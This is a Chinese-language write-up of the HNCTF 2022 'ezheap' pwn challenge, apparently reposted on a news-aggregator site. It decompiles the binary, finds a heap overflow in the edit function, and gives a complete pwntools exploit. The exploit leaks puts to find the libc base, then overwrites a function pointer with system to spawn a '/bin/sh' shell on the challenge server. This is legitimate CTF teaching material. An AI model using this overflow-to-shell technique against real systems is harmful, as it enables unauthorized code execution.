当前位置：首页 > news >正文

NSSCTF [HNCTF 2022 WEEK4]

news 2025/5/15 6:18:47

题解前的吐槽：紧拖慢拖还是在前段时间开始学了堆的UAF(虽然栈还没学明白，都好难[擦汗])，一直觉得学的懵懵懂懂，不太敢发题解，这题算是入堆题后一段时间的学习成果，有什么问题各位师傅可以提出来，作者会积极学习改进的[抱拳]

[HNCTF 2022 WEEK4]堆溢出

[HNCTF 2022 WEEK4]

(1)

motaly@motaly-VMware-Virtual-Platform:~$ file ezheap
ezheap: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /home/motaly/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so, BuildID[sha1]=b12e04dbc932d18202bfbea92a529b281e947ec0, for GNU/Linux 3.2.0, not stripped
motaly@motaly-VMware-Virtual-Platform:~$ checksec --file=ezheap
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   RW-RUNPATH   85 Symbols	  No	0		2		ezheap

(2)

更改题目libc版本

motaly@motaly-VMware-Virtual-Platform :~ $ patchelf -- set-interpreter /home/motaly/glibc-all-in-one/libs/2.23-Oubuntu11.3_amd64/ld-2.23.so ./ezheap
motaly@motaly-VMware-Virtual-Platform :~ $ patchelf -- set-rpath /home/motaly/glibc-all-in-one/libs/2.23-Oubuntu11.3_amd64/ ./ezheap
motaly@motaly-VMware-Virtual-Platform :~ $ ldd ezheap
linux-vdso.so.1 (0x0000746229e5f000)
libc.so.6 => /home/motaly/glibc-all-in-one/libs/2.23-Oubuntu11.3_amd64/libc.so.6 (0x0000746229a00000)
/home/motaly/glibc-all-in-one/libs/2.23-Oubuntu11.3_amd64/ld-2.23.so =>/lib64/ld-linux-x86-64.so.2 (0x0000746229e61000)

我这里用的是2.23-0ubuntu11.3_amd64

(3)

ida分析

main函数

int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{int n4; // [rsp+Ch] [rbp-4h]init_env(argc, argv, envp);puts("Easy Note.");while ( 1 ){while ( 1 ){menu();n4 = getnum();if ( n4 != 4 )break;edit();}if ( n4 > 4 ){
LABEL_13:puts("Invalid!");}else if ( n4 == 3 ){show();}else{if ( n4 > 3 )goto LABEL_13;if ( n4 == 1 ){add();}else{if ( n4 != 2 )goto LABEL_13;delete();}}}
}

就一个堆题正常的菜单，有增删改查功能，依次查看

add函数

int add()
{__int64 v0; // rbx__int64 v1; // raxint v3; // [rsp+0h] [rbp-20h]int size; // [rsp+4h] [rbp-1Ch]puts("Input your idx:");v3 = getnum();puts("Size:");size = getnum();if ( (unsigned int)size > 0x100 ){LODWORD(v1) = puts("Invalid!");}else{heaplist[v3] = malloc(0x20uLL);                  //系统创建0x20大小的堆块if ( !heaplist[v3] ){puts("Malloc Error!");exit(1);}v0 = heaplist[v3];*(_QWORD *)(v0 + 16) = malloc(size);             //创建一个自定义大小的堆块*(_QWORD *)(heaplist[v3] + 32LL) = &puts;        //在0x20大小的堆块起始地址偏移                                                          0x20处写入puts函数地址if ( !*(_QWORD *)(heaplist[v3] + 16LL) ){puts("Malloc Error!");exit(1);}sizelist[v3] = size;puts("Name: ");if ( !(unsigned int)read(0, (void *)heaplist[v3], 0x10uLL) ){puts("Something error!");exit(1);}puts("Content:");if ( !(unsigned int)read(0, *(void **)(heaplist[v3] + 16LL), sizelist[v3]) ){puts("Error!");exit(1);}puts("Done!");v1 = heaplist[v3];*(_DWORD *)(v1 + 24) = 1;}return v1;
}

这里会泄露puts函数地址

delete函数

_QWORD *delete()
{_QWORD *heaplist; // raxunsigned int n0x10; // [rsp+Ch] [rbp-4h]puts("Input your idx:");n0x10 = getnum();if ( n0x10 <= 0x10 && *(_DWORD *)(heaplist[n0x10] + 24LL) ){free(*(void **)(heaplist[n0x10] + 16LL));free((void *)heaplist[n0x10]);sizelist[n0x10] = 0LL;*(_DWORD *)(heaplist[n0x10] + 24LL) = 0;*(_QWORD *)(heaplist[n0x10] + 16LL) = 0LL;heaplist = heaplist;heaplist[n0x10] = 0LL;}else{puts("Error idx!");return 0LL;}return heaplist;
}

没有UAF漏洞

show函数

__int64 show()
{unsigned int n0x10; // [rsp+Ch] [rbp-4h]puts("Input your idx:");n0x10 = getnum();if ( n0x10 < 0x10 && heaplist[n0x10] ){(*(void (__fastcall **)(_QWORD))(heaplist[n0x10] + 32LL))(heaplist[n0x10]);return (*(__int64 (__fastcall **)(_QWORD))(heaplist[n0x10] + 32LL))(*(_QWORD *)(heaplist[n0x10] + 16LL));}else{puts("Error idx!");return 0LL;}
}

正常的输出

edit函数

ssize_t edit()
{unsigned int n0x10; // [rsp+8h] [rbp-8h]unsigned int nbytes; // [rsp+Ch] [rbp-4h]puts("Input your idx:");n0x10 = getnum();puts("Size:");nbytes = getnum();if ( n0x10 <= 0x10 && heaplist[n0x10] && nbytes <= 0x100 )return read(0, *(void **)(heaplist[n0x10] + 16LL), nbytes);puts("Error idx!");return 0LL;
}

这里修改堆块大小只要小于等于0x100，当修改大小大于原本堆块大小时，会造成堆溢出。

(4)

思路:

这题有堆溢出和泄露了puts函数地址
1.我们可以先得到puts函数地址，来获得libc基址
2.然后修改puts函数地址为system函数地址，写入'/bin/sh'
先创建两个堆块(考虑系统创建的0x20大小chunk和我们后面的覆盖大小，这里选择方便一点的0x10大小)

from pwn import *
context.log_level = "debug"
# io=remote('node5.anna.nssctf.cn',21013)
io= process('/home/motaly/ezheap')
libc=ELF('/home/motaly/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')def add(index, size, name, content):io.sendlineafter("Choice:", "1")io.sendlineafter("Input your idx:", str(index))io.sendlineafter("Size:", str(size))io.sendlineafter("Name:", name)io.sendlineafter("Content:", content)def delete(index):io.sendlineafter("Choice:", "2")io.sendlineafter("Input your idx:", str(index))def show(index):io.sendlineafter("Choice:", "3")io.sendlineafter("Input your idx:", str(index))def edit(index, size, content):io.sendlineafter("Choice:", "4")io.sendlineafter("Input your idx:", str(index))io.sendlineafter("Size:", str(size))io.send(content)add(0, 0x10, "000", "a") #0
add(1, 0x10, "111", "b") #1

可以看到这里0x725a11c6f6a0是puts函数地址
我们需要得到这个地址，edit编辑函数，修改的是堆块内容，所以我们可以从第一个堆块的内容开始覆盖，一直覆盖到第二个堆块的指针处，改写第二个堆块的指针，使其原本指向自己堆块内容的，现在指向puts函数地址，最后通过show函数输出，代码如下

add(0, 0x10, "000", "aaa") #0
add(1, 0x10, "111", "bbb") #1payload = b'A'*24 + p64(0x31) + b'B'*16 + b'\x80'    #0x31长度
edit(0, 0x40, payload)
show(1)

这里的b'A'24是覆盖这一段

p64(0x31)是写入第二个堆块的size大小

b'B'16是正好这一段

最后b'\x80'是改指针的最后一位

这里edit修改堆块的大小是根据payload长度，给的大小不能小于payload长度
最后运行的结果是这样的

能够输出puts函数地址后，就是接收puts函数地址得到libc基址
这里打远程，直接可以用这一段接收

add(0, 0x10, "000", "aaa") #0
add(1, 0x10, "111", "bbb") #1payload = b'A'*24 + p64(0x31) + b'B'*16 + b'\x80'
edit(0, 0x40, payload)
show(1)libc_base=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b"\x00"))-libc.sym['puts']
log.success('libc_base :'+hex(libc_base))

但本地我这有点问题，一开始我是这样子写的

io.recv()
libc_base=u64(io.recv(7)[-6:].ljust(8,b'\x00'))-libc.sym['puts']
log.success('libc_base :'+hex(libc_base))
gdb.attach(io)
pause()

但是这样子发现他读取了我填充的B值，没读到puts函数地址

经过我的反复修改，最后选择接收到payload最后的80处，然后计算到puts函数地址首位的距离进行读取

io.recvuntil(b'\x80')
libc_base=u64(io.recv(12)[-6:].ljust(8,b'\x00'))-libc.sym['puts']
log.success('libc_base :'+hex(libc_base))

20到73总共12位
最后就是跟上面一样，再次edit编辑第一块，这次通过溢处把原先第二块的puts函数的地址改为system函数地址，在第二块name处写入'/bin/sh'，最后show输出

system = libc_base + libc.sym["system"]
payload = b'A'*24 + p64(0x31)  + b'/bin/sh\x00' + b'B'*24 + p64(system)
edit(0, 0x50, payload)
show(1)

最后汇总的exp脚本如下

from pwn import *
context.log_level = "debug"
io=remote('node5.anna.nssctf.cn',21013)
# io= process('/home/motaly/ezheap')
libc=ELF('/home/motaly/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')def add(index, size, name, content):io.sendlineafter("Choice:", "1")io.sendlineafter("Input your idx:", str(index))io.sendlineafter("Size:", str(size))io.sendlineafter("Name:", name)io.sendlineafter("Content:", content)def delete(index):io.sendlineafter("Choice:", "2")io.sendlineafter("Input your idx:", str(index))def show(index):io.sendlineafter("Choice:", "3")io.sendlineafter("Input your idx:", str(index))def edit(index, size, content):io.sendlineafter("Choice:", "4")io.sendlineafter("Input your idx:", str(index))io.sendlineafter("Size:", str(size))io.send(content)add(0, 0x10, "000", "aaa") #0
add(1, 0x10, "111", "bbb") #1payload = b'A'*24 + p64(0x31) + b'B'*16 + b'\x80'
edit(0, 0x40, payload)
show(1)libc_base=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b"\x00"))-libc.sym['puts']
# io.recvuntil(b'\x80')
# libc_base=u64(io.recv(12)[-6:].ljust(8,b'\x00'))-libc.sym['puts']
log.success('libc_base :'+hex(libc_base))system = libc_base + libc.sym["system"]
payload = b'A'*24 + p64(0x31)  + b'/bin/sh\x00' + b'B'*24 + p64(system)
edit(0, 0x50, payload)
show(1)io.interactive()

查看全文

http://www.xdnf.cn/news/443737.html